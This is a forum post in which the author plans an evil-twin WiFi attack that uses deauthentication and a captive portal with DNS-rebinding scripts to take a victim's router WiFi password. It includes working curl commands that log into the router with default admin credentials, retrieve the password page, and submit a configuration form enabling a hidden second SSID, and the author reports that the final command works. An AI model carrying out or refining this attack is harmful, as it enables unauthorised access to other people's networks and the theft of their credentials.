[mooooon]

as the title says i want to perform this attack https://sinister.ly/Thread-DNS-Rebinding-Attack

using evil twin on local level

the curl command to login into the router

Code:

curl "http://192.168.1.1/" --data "frashnum=&action=login&Frm_Logintoken=25&Username=admin&Password=admin"

the curl command to get the page that contains the wifi password

Code:

curl -v -X GET "http://192.168.1.1/getpage.gch?pid=1002^&nextpage=net_t.gch" -o 565.html

this how i was planing to perform the attack
evil twining a wifi using fluxion or whatever .... when the user opens the captive portal sign in network page (that has dns rebinding scripts in it )is detected we stop the ddos ... the user auto connects to his wifi then the page refreshes and execute the dns rebinding attack to get the wifi password from his router ....

but now i don't know how will get the html file back if want to use it in local level only so the other option was
to enable the second ssid that will launch with the default password so i can just login without getting any thing back
but i tried the curl command and it didn't work

Code:

curl "http://192.168.1.1/getpage.gch?pid=1002^&nextpage=net_wlan_essid_t.gch" -H "Origin: http://192.168.1.1" -H "Upgrade-Insecure-Requests: 1" -H "DNT: 1" -H "Content-Type: application/x-www-form-urlencoded" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36" -H "Referer: http://192.168.1.1/getpage.gch?pid=1002^&nextpage=net_wlan_essid_t.gch^&IF_VIEWID=IGD.LD1.WLAN2" --data "IF_ERRORSTR=SUCC^&IF_ERRORPARAM=SUCC^&IF_ERRORTYPE=-1^&IF_CONFIGTAG=Y^&IF_ACTION=apply^&WLAN_INSTNUM=4^&WLAN_SSID0=IGD.LD1.WLAN1^&WLAN_SSID1=IGD.LD1.WLAN2^&WLAN_SSID2=IGD.LD1.WLAN3^&WLAN_SSID3=IGD.LD1.WLAN4^&IF_SSIDATTR1=0^&IF_SSIDATTR2=0^&IF_SSIDATTR3=0^&IF_SSIDATTR4=0^&IF_VIEWID=IGD.LD1.WLAN2^&SettingStatus=CurruntSetting^&CardIsIn=1^&MaxInterface=4^&DeviceMode=InfrastructureAccessPoint^&CardMode=b^%^2Cg^%^2Cn^%^2Cbg^%^2Cgn^%^2Cbgn^&CardRev=0^&Class=255^&PID=33169^&VID=4332^&ValidIf=1^&Enable=1^&RadioStatus=NULL^&Standard=NULL^&BeaconInterval=NULL^&RtsCts=NULL^&Fragment=NULL^&DTIM=NULL^&TxPower=NULL^&CountryCode=NULL^&TxRate=NULL^&Channel=NULL^&ESSID=12345^&ESSIDPrefix=NULL^&ACLPolicy=NULL^&BeaconType=NULL^&WEPAuthMode=NULL^&WEPEncryptionLevel=NULL^&WEPKeyIndex=NULL^&WPAAuthMode=NULL^&WPAEncryptType=NULL^&WPAGroupRekey=NULL^&WPAEAPServerIp=NULL^&RadiusPort=NULL^&RadiusServerPort=NULL^&WPAEAPSecret=NULL^&PossibleChannels=NULL^&BasicDataRates=NULL^&OpDataRates=NULL^&PossibleTxRates=NULL^&OOBAccessEnabled=NULL^&BeaconEnabled=NULL^&ESSIDHideEnable=1^&RegulatoryDomain=NULL^&WlanMode=NULL^&DistanceFromRoot=NULL^&PeerBSSID=NULL^&AuthServiceMode=NULL^&QosType=NULL^&Priority=1^&UAPSDEnabled=NULL^&AutoChannelEnabled=NULL^&ChannelsInUse=NULL^&11iAuthMode=NULL^&11iEncryptType=NULL^&MaxUserNum=32^&SSIDIsolationEnable=NULL^&VapIsolationEnable=0^&Band=2.4G^&11nMode=1^&BandWidth=20Mhz^&SideBand=Lower^&11nRate=Auto^&SGIEnabled=0^&GreenField=0^&WdsMode=WDS_Disable^&Tx2Path=1^&IsPublicWiFiInterface=NULL^&MasterAuthServerIp=0.0.0.0^&MasterAuthServerPort=0^&MasterAuthServerSecret=^&Name=wlan0^&RealRF=1^&ChannelInUsed=8^&TxRateInUsed=Auto^&Bssid=54^%^3Abe^%^3A53^%^3A6a^%^3Af6^%^3Ac0^&IfStatus=Up^&UAPSDSupported=1^&WMMSupported=1^&TotalAssociations=4^&TotalBytesSent=2246220234^&TotalBytesReceived=3268409714^&TotalPacketsSent=22743088^&TotalPacketsReceived=14280169^&ErrorsSent=3057^&ErrorsReceived=0^&NonUnicastPacketsReceived=0^&UnicastPacketsSent=97163073747419137^&UnicastPacketsReceived=61100857587924993^&DiscardPacketsSent=8137^&DiscardPacketsReceived=68^&TotalPSKFailures=66^&TotalIntegrityFailures=6^&NumEasyPair=0^&ConnectStatus=Disconnected^&SingalQuality=0^&SingalStrength=0^&_SESSION_TOKEN=2714922195119803" --compressed

cause it needs to check a checkbox as i think

more about this problem
https://www.sitepoint.com/community/t/ho...ion/325785

edit i got the command working by removing every ^ from it

what do you think folks ?